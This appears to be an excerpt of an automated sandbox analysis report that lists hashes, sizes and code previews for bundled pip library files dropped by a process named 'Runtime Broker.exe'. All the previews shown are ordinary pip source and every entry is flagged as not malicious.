Preview:	from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..from .base import Requirement, format_name..if MYPY_CHECK_RUNNING:. from pip._vendor.packaging.specifiers import SpecifierSet.. from pip._internal.req.req_install import InstallRequirement.. from .base import Candidate, CandidateLookup...class ExplicitRequirement(Requirement):. def __init__(self, candidate):. # type: (Candidate) -> None. self.candidate = candidate.. def __str__(self):. # type: () -> str. return str(self.candidate).. def __repr__(self):. # type: () -> str. return "{class_name}({candidate!r})".format(. class_name=self.__class__.__name__,. candidate=self.candidate,. ).. @property. def project_name(self):. # type: () -> str. # No need to canonicalise - the candidate did this. return self.candidate.project_name.. @property. def name(self)

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\resolution\resolvelib\resolver.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	11634
Entropy (8bit):	4.291714355030408
Encrypted:	false
SSDEEP:	192:mIdwlWQifHupROcFvfNbrBEY7NIqJD+sj9n4zKqTBAt2uhz:mIdJfHu/HHxrBHUenY/u9
MD5:	D47EBBF43D6B45C93E939F4F7F81D527
SHA1:	944482F7C578FB47B8883FADB43D13F243ACC1CB
SHA-256:	21A8D5C64ACE6167D90EC1D40EED91D58EFDCAC546B80F32C1A1783882B631C5
SHA-512:	9215AC0720F154D788FF2AD61BCE5D4B9AA33BAEA07D9C7DB6081AEB2C5908E06F017DE5C5B28A980C4D0EB3561D5BFB9C0F8C409EB950540FE3EFCA9DB458C9
Malicious:	false
Preview:	import functools.import logging.import os..from pip._vendor import six.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.resolvelib import ResolutionImpossible.from pip._vendor.resolvelib import Resolver as RLResolver..from pip._internal.exceptions import InstallationError.from pip._internal.req.req_install import check_invalid_constraint_type.from pip._internal.req.req_set import RequirementSet.from pip._internal.resolution.base import BaseResolver.from pip._internal.resolution.resolvelib.provider import PipProvider.from pip._internal.resolution.resolvelib.reporter import (. PipDebuggingReporter,. PipReporter,.).from pip._internal.utils.deprecation import deprecated.from pip._internal.utils.filetypes import is_archive_file.from pip._internal.utils.misc import dist_is_editable.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..from .base import Constraint.from .factory import Factory..if MYPY_CHECK_RUNNING:. from typing import Dict, List, Optio

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\self_outdated_check.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	6745
Entropy (8bit):	4.450150873937106
Encrypted:	false
SSDEEP:	192:QH/rgkcB8cekN1V0ZnzDOVrxrIZNl4Shamq:QH/riBK+V0ZKtrIZN6SO
MD5:	6018B280EB00E833E33CEF0677C233FB
SHA1:	ADFAC65B00F903C43D4D12E8B379FB8D1B0A60A1
SHA-256:	7153EE05A3FCF679BC41D7FFBD5757671C2DB7C79B9B8B4BF1F712B4F977754F
SHA-512:	6B86193A609A10B45F4BFB6F96F2A3D7C2F4BBA4661E2739774F01646B43A19EA8E48117A41FA71D2F38FEE5B0715936B5CCA96C276089580242BC62F87EA587
Malicious:	false
Preview:	from __future__ import absolute_import..import datetime.import hashlib.import json.import logging.import os.path.import sys..from pip._vendor.packaging import version as packaging_version.from pip._vendor.six import ensure_binary..from pip._internal.index.collector import LinkCollector.from pip._internal.index.package_finder import PackageFinder.from pip._internal.models.selection_prefs import SelectionPreferences.from pip._internal.utils.filesystem import adjacent_tmp_file, check_path_owner, replace.from pip._internal.utils.misc import ensure_dir, get_distribution, get_installed_version.from pip._internal.utils.packaging import get_installer.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. import optparse. from typing import Any, Dict, Text, Union.. from pip._internal.network.session import PipSession...SELFCHECK_DATE_FMT = "%Y-%m-%dT%H:%M:%SZ"...logger = logging.getLogger(__name__)...def _get_statefile_name(key):. # type: (Union[str, Text

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\appdirs.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1349
Entropy (8bit):	4.795042556837416
Encrypted:	false
SSDEEP:	24:xnBITTGI2Md9ezkvM5taoRdRembulyOztJ9HK6Hi:xnB0TGIgzkU5taoRdRemalyOztJNzC
MD5:	7A012F5B424654BB5958C2C84E4A233D
SHA1:	07EB05F2A535BECF41F7A36C6F8E3C066965C0FC
SHA-256:	459CD41BE0648766FE9A25F40D2677BFBD37FFE6E02BEBF43DF5820A3C1513D8
SHA-512:	A8D714616448E992339416E50F9C06831E5E4E60C53C628C135A541C1BF5B3399F5A41F2D5E3C199D713B5AEA7237ED77F5D0A8BC417F2F75C172F6489ABEBC9
Malicious:	false
Preview:	""".This code wraps the vendored appdirs module to so the return values are.compatible for the current pip code base...The intention is to rewrite current usages gradually, keeping the tests pass,.and eventually drop this after all usages are changed.."""..from __future__ import absolute_import..import os..from pip._vendor import appdirs as _appdirs..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List...def user_cache_dir(appname):. # type: (str) -> str. return _appdirs.user_cache_dir(appname, appauthor=False)...def user_config_dir(appname, roaming=True):. # type: (str, bool) -> str. path = _appdirs.user_config_dir(appname, appauthor=False, roaming=roaming). if _appdirs.system == "darwin" and not os.path.isdir(path):. path = os.path.expanduser('~/.config/'). if appname:. path = os.path.join(path, appname). return path...# for the discussion regarding site_config_dir locations.# see <htt

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\compat.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	9489
Entropy (8bit):	4.6507642400467
Encrypted:	false
SSDEEP:	192:fGXkWfaKpjDAov2prc5UpeQ8oPy+SL1bpN8kD+eHYk0TDlk0TsH9bMhACRJ5:e3xXz5UpeNo4B6NTD3TsdbMhfn
MD5:	6E484E4473246FD703CDE4C33E353524
SHA1:	16B42D259CD271C84D40B01A31656E2593290467
SHA-256:	268495C6032657C6594F05EB3D11A0424D44CA898964CDE06FE9E8942C6C964A
SHA-512:	C144D83FA37501B32DE290C1FAF3D45AD599923FCDD9D89F028C8A53302B7E08889FF1713B8A16DA6A5BFD6D0444CA689F249DE7CC0CDC4A44B4489458DD2655
Malicious:	false
Preview:	"""Stuff that differs in different Python versions and platform.distributions."""..# The following comment should be removed at some point in the future..# mypy: disallow-untyped-defs=False..from __future__ import absolute_import, division..import codecs.import functools.import locale.import logging.import os.import shutil.import sys..from pip._vendor.six import PY2, text_type..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Callable, Optional, Protocol, Text, Tuple, TypeVar, Union.. # Used in the @lru_cache polyfill.. F = TypeVar('F').. class LruCache(Protocol):. def __call__(self, maxsize=None):. # type: (Optional[int]) -> Callable[[F], F]. raise NotImplementedError..try:. import ipaddress.except ImportError:. try:. from pip._vendor import ipaddress # type: ignore. except ImportError:. import ipaddr as ipaddress # type: ignore. ipaddress.ip_address = ipaddres

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\compatibility_tags.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5690
Entropy (8bit):	4.672769335250978
Encrypted:	false
SSDEEP:	96:OBTzkYnFtuL5CUoEJ4Gk77B9gmJwLzEfENJWDraFchC2KcodXYmcvrO:OdkcvuL5Eoyl2LWD2FV+PrO
MD5:	D73E2CAFA36B2DE888FBF65867A7F4DF
SHA1:	93FEB556A316701836A49A4B84F448D24A5CA64F
SHA-256:	D9FAED528B38747787295DFC9E837FAECFEEF154DE872E1E331AB211856D66D6
SHA-512:	BB9E631925A58457936212EAC47B9D59D9CF375C4A4014BFB09870733F0CC443351E37993D09F444779B27396D9D28D4A08BB182A4F39F3EE2138B4E71937A74
Malicious:	false
Preview:	"""Generate and work with PEP 425 Compatibility Tags.."""..from __future__ import absolute_import..import re..from pip._vendor.packaging.tags import (. Tag,. compatible_tags,. cpython_tags,. generic_tags,. interpreter_name,. interpreter_version,. mac_platforms,.)..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional, Tuple.. from pip._vendor.packaging.tags import PythonVersion.._osx_arch_pat = re.compile(r'(.+)_(\d+)_(\d+)_(.+)')...def version_info_to_nodot(version_info):. # type: (Tuple[int, ...]) -> str. # Only use up to the first two numbers.. return ''.join(map(str, version_info[:2]))...def _mac_platforms(arch):. # type: (str) -> List[str]. match = _osx_arch_pat.match(arch). if match:. name, major, minor, actual_arch = match.groups(). mac_version = (int(major), int(minor)). arches = [. # Since we have always only checked that the platform star

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\datetime.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	295
Entropy (8bit):	4.463609594693681
Encrypted:	false
SSDEEP:	6:tj57fwfMABCR9Cx/McZbhyE+IkThA7p8BsjD7QpCJbhy9/oXEcvg:P0fjCTCxHcW7p8qD0pCJFo/oFY
MD5:	DE9363A76C05AA7F9FA8F26408021E53
SHA1:	966624E345CAEFD47D09D5951F676188C1EBB245
SHA-256:	28BFAF21D194F49229181E4D6249B05D6907F86FF69AFBC0065991B68499B1AA
SHA-512:	D0D82BCA532F8F771563C7199DCEAFEAA3E2C6D06A6A676CB3B799BCEC850297C7AAA50D3535459B4322CFDCC20A80F5FB65A65BE08FF8C9BE95DB6E05220134
Malicious:	false
Preview:	"""For when pip wants to check the date or time.."""..from __future__ import absolute_import..import datetime...def today_is_later_than(year, month, day):. # type: (int, int, int) -> bool. today = datetime.date.today(). given = datetime.date(year, month, day).. return today > given.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\deprecation.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3318
Entropy (8bit):	4.6103517682091155
Encrypted:	false
SSDEEP:	96:zSu9zkPSQslsceQsocyuHkDPweLgpipZoHfq:zSekUuHJCU/q
MD5:	C6F60579AAB1E0AA265F79BDDADC471C
SHA1:	D07B640699069CA8476A44DD629441A5885AA234
SHA-256:	A419CDA20A00E14193C5AFC90E73D7051458A4A31B1310215E9070030925381B
SHA-512:	23922DF3935A78F44B89527B93E51EF75C849F2BA3AA75457BAD1FF6AF88D545364D8ED0D0A9684AE18B7C971D76B1B17E4AA1A9B1AD70B2F4E4EEC63B15177A
Malicious:	false
Preview:	""".A module that implements tooling to enable easy warnings about deprecations.."""..# The following comment should be removed at some point in the future..# mypy: disallow-untyped-defs=False..from __future__ import absolute_import..import logging.import warnings..from pip._vendor.packaging.version import parse..from pip import __version__ as current_version.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Any, Optional...DEPRECATION_MSG_PREFIX = "DEPRECATION: "...class PipDeprecationWarning(Warning):. pass..._original_showwarning = None # type: Any...# Warnings <-> Logging Integration.def _showwarning(message, category, filename, lineno, file=None, line=None):. if file is not None:. if _original_showwarning is not None:. _original_showwarning(. message, category, filename, lineno, file, line,. ). elif issubclass(category, PipDeprecationWarning):. # We use a specially n

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\direct_url_helpers.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4146
Entropy (8bit):	4.592081507335809
Encrypted:	false
SSDEEP:	96:01azIzcxpMsme6chiO9FoMF9R4Yrf7a390WJ:01SIzcvme66D9FoMF9eYu90WJ
MD5:	FDB46585E66D7E2E24E416DB46D665EC
SHA1:	FDC6D45B595DF6855E1DE3662CA9591D5A9071A3
SHA-256:	43473ECF48AE431FC3D4579196EEE7643E61DA7B78412A30DB7076E8F42BA74B
SHA-512:	0B6B33EFE0B4D6B4216B38C032DF64B560C045F110DBCB1D54236F6D1497911A03E948C95DA0F8FE10323C5681C2FD651D51AA67B8B547B6BC37E1E5B30D100D
Malicious:	false
Preview:	import logging..from pip._internal.models.direct_url import (. DIRECT_URL_METADATA_NAME,. ArchiveInfo,. DirectUrl,. DirectUrlValidationError,. DirInfo,. VcsInfo,.).from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.vcs import vcs..try:. from json import JSONDecodeError.except ImportError:. # PY2. JSONDecodeError = ValueError # type: ignore..if MYPY_CHECK_RUNNING:. from typing import Optional.. from pip._vendor.pkg_resources import Distribution.. from pip._internal.models.link import Link..logger = logging.getLogger(__name__)...def direct_url_as_pep440_direct_reference(direct_url, name):. # type: (DirectUrl, str) -> str. """Convert a DirectUrl to a pip requirement string.""". direct_url.validate() # if invalid, this is a pip bug. requirement = name + " @ ". fragments = []. if isinstance(direct_url.info, VcsInfo):. requirement += "{}+{}@{}".format(. direct_url.info.vcs, direct_url.url, dir

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\distutils_args.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1350
Entropy (8bit):	4.693862852873091
Encrypted:	false
SSDEEP:	24:1BNMfuMgUezkvC9hXy0XDVzIBmVfb/NisKOvwy9k1JMV75wOo4Fw9j74MQ4oZvrp:GdgdzkKxpiPx1qfosJtBvWSXt
MD5:	3867518AEDA9563B12FFDC4EEA409ACB
SHA1:	AD80BC96C519DBAC6A9D13D3DA1871E6C2B2CB46
SHA-256:	6B9EA66E537193D04689F6E91044C6EB59A606BAA18ED8D1909E07627FA83841
SHA-512:	9A92F1F1DA9F23E99B53FD36CD3CEA4BEE09BCE79E40A58E79DFB3C3FD8D6ADB66EE92082716416EEDC6DF7906F3D8D4518A68FCF14671C20180B301932E5BBD
Malicious:	false
Preview:	from distutils.errors import DistutilsArgError.from distutils.fancy_getopt import FancyGetopt..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Dict, List..._options = [. ("exec-prefix=", None, ""),. ("home=", None, ""),. ("install-base=", None, ""),. ("install-data=", None, ""),. ("install-headers=", None, ""),. ("install-lib=", None, ""),. ("install-platlib=", None, ""),. ("install-purelib=", None, ""),. ("install-scripts=", None, ""),. ("prefix=", None, ""),. ("root=", None, ""),. ("user", None, ""),.]...# typeshed doesn't permit Tuple[str, None, str], see python/typeshed#3469.._distutils_getopt = FancyGetopt(_options) # type: ignore...def parse_distutils_args(args):. # type: (List[str]) -> Dict[str, str]. """Parse provided arguments, returning an object that has the. matched arguments... Any unknown arguments are ignored.. """. result = {}. for arg in args:. try:

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\encoding.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1284
Entropy (8bit):	5.1038021321041755
Encrypted:	false
SSDEEP:	24:9dmezkv2yz/5ksDjaETqi2ZF5wSy/WGLiTdRRpqw4p1aw/ba6g4e8+Kv:H/zkn/5JDjlTqXN8ejZa+w/2x47
MD5:	970DEAB94324BD34C234B32A8F331D9F
SHA1:	F80DEEB140E94CC2ACD706FE4F078110A6760ADE
SHA-256:	E77A771F7EB0738F5DCABD0482D05B74776F1F80EBF84825D3373F274B307AA7
SHA-512:	42905745553C5FF6D61EEC1E33431CB1CF5765978F89305B3EAA0AEF3A4278570F4CBE93DC2AC56DC3F61DE788677361194DF47C1F7F0C7D969B518A5D3DC57C
Malicious:	false
Preview:	import codecs.import locale.import re.import sys..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Text, Tuple..BOMS = [. (codecs.BOM_UTF8, 'utf-8'),. (codecs.BOM_UTF16, 'utf-16'),. (codecs.BOM_UTF16_BE, 'utf-16-be'),. (codecs.BOM_UTF16_LE, 'utf-16-le'),. (codecs.BOM_UTF32, 'utf-32'),. (codecs.BOM_UTF32_BE, 'utf-32-be'),. (codecs.BOM_UTF32_LE, 'utf-32-le'),.] # type: List[Tuple[bytes, Text]]..ENCODING_RE = re.compile(br'coding[:=]\s*([-\w.]+)')...def auto_decode(data):. # type: (bytes) -> Text. """Check a bytes string for a BOM to correctly detect the encoding.. Fallback to locale.getpreferredencoding(False) like open() on Python3""". for bom, encoding in BOMS:. if data.startswith(bom):. return data[len(bom):].decode(encoding). # Lets check the first two lines as in PEP263. for line in data.split(b'\n')[:2]:. if line[0:1] == b'#' and ENCODING_RE.search(line):.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\entrypoints.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1152
Entropy (8bit):	4.6421022215925785
Encrypted:	false
SSDEEP:	24:kmNfezkvKt65fP335wCkXM5cZqPAPKZdTlCkkIsUG6N:klzkS0B/35jkXM50XK1gFIsSN
MD5:	EAF26AFF730936DA973E66309E7B65E4
SHA1:	C5A9CAB2A36C1DC843D2B4B1E7D453E612FBECF6
SHA-256:	CAF8B35DDAC878AE38388F89D980487288DFAD7C463BDA1EF090B106F31DC489
SHA-512:	C3052E6FDEE99B255B5E2FCE6A608D1453DA9A427A575EE3587D41BB67673EEFF72B9C7DE9E586EFA12BE2634C02CF1CD08D4293A7B87E7D3141933BDE8D260B
Malicious:	false
Preview:	import sys..from pip._internal.cli.main import main.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional...def _wrapper(args=None):. # type: (Optional[List[str]]) -> int. """Central wrapper for all old entrypoints... Historically pip has had several entrypoints defined. Because of issues. arising from PATH, sys.path, multiple Pythons, their interactions, and most. of them having a pip installed, users suffer every time an entrypoint gets. moved... To alleviate this pain, and provide a mechanism for warning users and. directing them to an appropriate place for help, we now define all of. our old entrypoints as wrappers for the current one.. """. sys.stderr.write(. "WARNING: pip is being invoked by an old script wrapper. This will ". "fail in a future version of pip.\n". "Please see https://github.com/pypa/pip/issues/5599 for advice on ". "fixing the underlying

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\filesystem.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	6943
Entropy (8bit):	4.527994769513851
Encrypted:	false
SSDEEP:	192:/RsItjsMTkfvOgkZWfi6XSBwRjN8DiJBGZS/SgxwHv:/RsaJTevOPgkSB8DiJBGZS8
MD5:	6FD14CF50C9640D63132BFDCBA580FB4
SHA1:	5F1186C19ABB5BF45F994FF3004596B024617569
SHA-256:	F9F5375ED7820082707FFF45BC2654EEF872C2FB779EE7FF72A902770832D58F
SHA-512:	9EDC4502128A4CCFC20EADB72525093000AEF0A28E85991F968E54713B8A8F1E8F58190B4054D51F2CC7108ED91CEFD6A1323BB65DE85B0932F3AB439CA9421C
Malicious:	false
Preview:	import errno.import fnmatch.import os.import os.path.import random.import shutil.import stat.import sys.from contextlib import contextmanager.from tempfile import NamedTemporaryFile..# NOTE: retrying is not annotated in typeshed as on 2017-07-17, which is.# why we ignore the type on this import..from pip._vendor.retrying import retry # type: ignore.from pip._vendor.six import PY2..from pip._internal.utils.compat import get_path_uid.from pip._internal.utils.misc import format_size.from pip._internal.utils.typing import MYPY_CHECK_RUNNING, cast..if MYPY_CHECK_RUNNING:. from typing import Any, BinaryIO, Iterator, List, Union.. class NamedTemporaryFileResult(BinaryIO):. @property. def file(self):. # type: () -> BinaryIO. pass...def check_path_owner(path):. # type: (str) -> bool. # If we don't have a way to check the effective uid of this process, then. # we'll just assume that we own the directory.. if sys.platform == "win32" or

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\filetypes.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.226916865171636
Encrypted:	false
SSDEEP:	24:c2PezkvF+m2yP8y8Giy0zyNJ0dG8WbJOF5noXP:2zkN8yP8yyy0zyNJ0odOFSXP
MD5:	2E224A043405D66E7ADACF98B234B1E9
SHA1:	65D663D912AA726FAF433FD6EC7BE93DBC7098A6
SHA-256:	42F6A02F4566E2D319FEAC85AA8A595A96831C433743A172177E6F7CE63E0898
SHA-512:	86FB38C6742234BA46D3E2514FD6B889B448DF9F342772C8A8C028FD678AE414271ABCBBBD01A57A16B15A39829EC6F731B88AB808313B82C7A4D6097B890FCF
Malicious:	false
Preview:	"""Filetype information..""".from pip._internal.utils.misc import splitext.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Tuple..WHEEL_EXTENSION = '.whl'.BZ2_EXTENSIONS = ('.tar.bz2', '.tbz') # type: Tuple[str, ...].XZ_EXTENSIONS = ('.tar.xz', '.txz', '.tlz',. '.tar.lz', '.tar.lzma') # type: Tuple[str, ...].ZIP_EXTENSIONS = ('.zip', WHEEL_EXTENSION) # type: Tuple[str, ...].TAR_EXTENSIONS = ('.tar.gz', '.tgz', '.tar') # type: Tuple[str, ...].ARCHIVE_EXTENSIONS = (. ZIP_EXTENSIONS + BZ2_EXTENSIONS + TAR_EXTENSIONS + XZ_EXTENSIONS.)...def is_archive_file(name):. # type: (str) -> bool. """Return True if `name` is a considered as an archive file.""". ext = splitext(name)[1].lower(). if ext in ARCHIVE_EXTENSIONS:. return True. return False.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\glibc.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3297
Entropy (8bit):	4.883348320728314
Encrypted:	false
SSDEEP:	48:vD+/zkaNwpeTfUKDUbFOt6qI0J3PeIOwea072T5ECUtGL7xGkIko/VKY:vq/zkaNVTfUKD+wf1LOZ72TwekbF/VKY
MD5:	AAB0C65199508E62A90DEFAEDD9E65F0
SHA1:	CB4568BECAF70D38A0848B5CA292DB3EC42FD007
SHA-256:	2CE78D1A06B008A4BEE247BD7E28BBF1FC170FBDDDB4D6AFDEEC73D417FE01BF
SHA-512:	6E5077E74C1876D68052C0EE4B8D200A8C8A61DB23BE9AC653D65C4EF0F3451B882D2AC2CF7435DBBAC1EA2E48959150B02CA479FAC5C01F62F86E214CC8407B
Malicious:	false
Preview:	# The following comment should be removed at some point in the future..# mypy: strict-optional=False..from __future__ import absolute_import..import os.import sys..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Optional, Tuple...def glibc_version_string():. # type: () -> Optional[str]. "Returns glibc version string, or None if not using glibc.". return glibc_version_string_confstr() or glibc_version_string_ctypes()...def glibc_version_string_confstr():. # type: () -> Optional[str]. "Primary implementation of glibc_version_string using os.confstr.". # os.confstr is quite a bit faster than ctypes.DLL. It's also less likely. # to be broken or missing. This strategy is used in the standard library. # platform module:. # https://github.com/python/cpython/blob/fcf1d003bf4f0100c9d0921ff3d70e1127ca1b71/Lib/platform.py#L175-L183. if sys.platform == "win32":. return None. try:. # os.confstr("

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\hashes.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5297
Entropy (8bit):	4.503493409471715
Encrypted:	false
SSDEEP:	96:BQzkLy/+ORMoygXoZg9k+HO0xdyts6yKncTlXuCEHqIN:ukeG9g4Z1+HOC4sccxXIHdN
MD5:	D0D408160E268ABB53C07094F574DA1C
SHA1:	52FF88574AA78FACAC67C058FE5AAE13AB4A2AE4
SHA-256:	C9D1465610E4D0D8F62726932B350745EE620676E0878286F8716D5DBAFFC66A
SHA-512:	51F1CAFC3B39F60A95AE9CBBE1C311B23833A5F15D293A00110066229E00DAB33B2C804A5AE912A38598603811EDDF52024C230E0A0DAE74F62C2B3AC060B3A5
Malicious:	false
Preview:	from __future__ import absolute_import..import hashlib..from pip._vendor.six import iteritems, iterkeys, itervalues..from pip._internal.exceptions import HashMismatch, HashMissing, InstallationError.from pip._internal.utils.misc import read_chunks.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import BinaryIO, Dict, Iterator, List, NoReturn.. from pip._vendor.six import PY3. if PY3:. from hashlib import _Hash. else:. from hashlib import _hash as _Hash...# The recommended hash algo of the moment. Change this whenever the state of.# the art changes; it won't hurt backward compatibility..FAVORITE_HASH = 'sha256'...# Names of hashlib algorithms allowed by the --hash option and ``pip hash``.# Currently, those are the ones at least as collision-resistant as sha256..STRONG_HASHES = ['sha256', 'sha384', 'sha512']...class Hashes(object):. """A wrapper that builds multiple hashes at once and checks them against. know

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\inject_securetransport.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	810
Entropy (8bit):	4.675947556655804
Encrypted:	false
SSDEEP:	24:E1Tu6QNLpHps8jntjzoGv8wf/ZyUo1FFmm:ml6Hps8DtNDoB
MD5:	FF4216EFE79AA69DC4E6C5EB89A265F8
SHA1:	FEF973603975B37924E99768CC7375EDCF4CCDE9
SHA-256:	335ED9945558EBA02981E01256328A2CA373D0B01F93E4B25341D9E1907A3262
SHA-512:	43C4D8A1005BCC80F90F394E77BEE2B5C0C33150D986A6A12CEED95DC08CEB49F96DE369DFF243D2E5DAECA2FAF7BB204969DB0B5CDD8B8E0E4D33B7525746D9
Malicious:	false
Preview:	"""A helper module that injects SecureTransport, on import...The import should be done as early as possible, to ensure all requests and.sessions (or whatever) are created after injecting SecureTransport...Note that we only do the injection on macOS, when the linked OpenSSL is too.old to handle TLSv1.2.."""..import sys...def inject_securetransport():. # type: () -> None. # Only relevant on macOS. if sys.platform != "darwin":. return.. try:. import ssl. except ImportError:. return.. # Checks for OpenSSL 1.0.1. if ssl.OPENSSL_VERSION_NUMBER >= 0x1000100f:. return.. try:. from pip._vendor.urllib3.contrib import securetransport. except (ImportError, OSError):. return.. securetransport.inject_into_urllib3()...inject_securetransport().

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\logging.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	13093
Entropy (8bit):	4.529496756284413
Encrypted:	false
SSDEEP:	192:XpYZBLZj9QR6S2p9OH8BHu2zy1r9lKB8Miz19b2eMgs4SpjL+:5YHLTQR6S2nOHkutlzvMgHSpW
MD5:	32FA2E11CBDD43906FEB7927B68486BF
SHA1:	83500560B33ABD162D9DFB3E61300AB0E1DCCC8D
SHA-256:	6087EE0D412499D9FD708450FC473CAE05ECD66E673B00C40AD66A3380811F95
SHA-512:	99DBCA088D7F52E2760A27C0D881CF0C5B83197CDFAD4401A5BFAB8616500BE03B8D70AB54BB616B54A0BC67AF53AD65ABC227CE6CF4D3ED2B63A255D5563B16
Malicious:	false
Preview:	# The following comment should be removed at some point in the future..# mypy: disallow-untyped-defs=False..from __future__ import absolute_import..import contextlib.import errno.import logging.import logging.handlers.import os.import sys.from logging import Filter, getLogger..from pip._vendor.six import PY2..from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.deprecation import DEPRECATION_MSG_PREFIX.from pip._internal.utils.misc import ensure_dir..try:. import threading.except ImportError:. import dummy_threading as threading # type: ignore...try:. # Use "import as" and set colorama in the else clause to avoid mypy. # errors and get the following correct revealed type for colorama:. # `Union[_importlib_modulespec.ModuleType, None]`. # Otherwise, we get an error like the following in the except block:. # > Incompatible types in assignment (expression has type "None",. # variable has type Module). # TODO: eliminate the need to use "imp

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\utils\misc.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	28047
Entropy (8bit):	4.661021106323702
Encrypted:	false
SSDEEP:	384:LLshVKU32qKMXaxxfcVK+dPvwAlPv6AwpymgvHAv34kyNh4CmwUmRA0cWUwGixmr:LLs7KG2n/a8+dwUKD3++LzWUwLxpqZd
MD5:	645FAF0B6B3E16EA95462A95E556ECCC
SHA1:	6227F063974376936B81996C28DFE917770B05BF
SHA-256:	8FE5D7763A62EC1B9856541E8290126C0958B2A8759FB3DD792848111E0CFC8C
SHA-512:	ED557C352994A8BFEF9F6EE9240F78562582A20AA32D67EAEF18346367280877588545A8C4E1655F222A3FE292034D8D7F0B0FFAB2961C13EB1835A59D7B733A
Malicious:	false
Preview:	# The following comment should be removed at some point in the future..# mypy: strict-optional=False.# mypy: disallow-untyped-defs=False..from __future__ import absolute_import..import contextlib.import errno.import getpass.import hashlib.import io.import logging.import os.import posixpath.import shutil.import stat.import sys.from collections import deque.from itertools import tee..from pip._vendor import pkg_resources.from pip._vendor.packaging.utils import canonicalize_name..# NOTE: retrying is not annotated in typeshed as on 2017-07-17, which is.# why we ignore the type on this import..from pip._vendor.retrying import retry # type: ignore.from pip._vendor.six import PY2, text_type.from pip._vendor.six.moves import filter, filterfalse, input, map, zip_longest.from pip._vendor.six.moves.urllib import parse as urllib_parse.from pip._vendor.six.moves.urllib.parse import unquote as urllib_unquote..from pip import 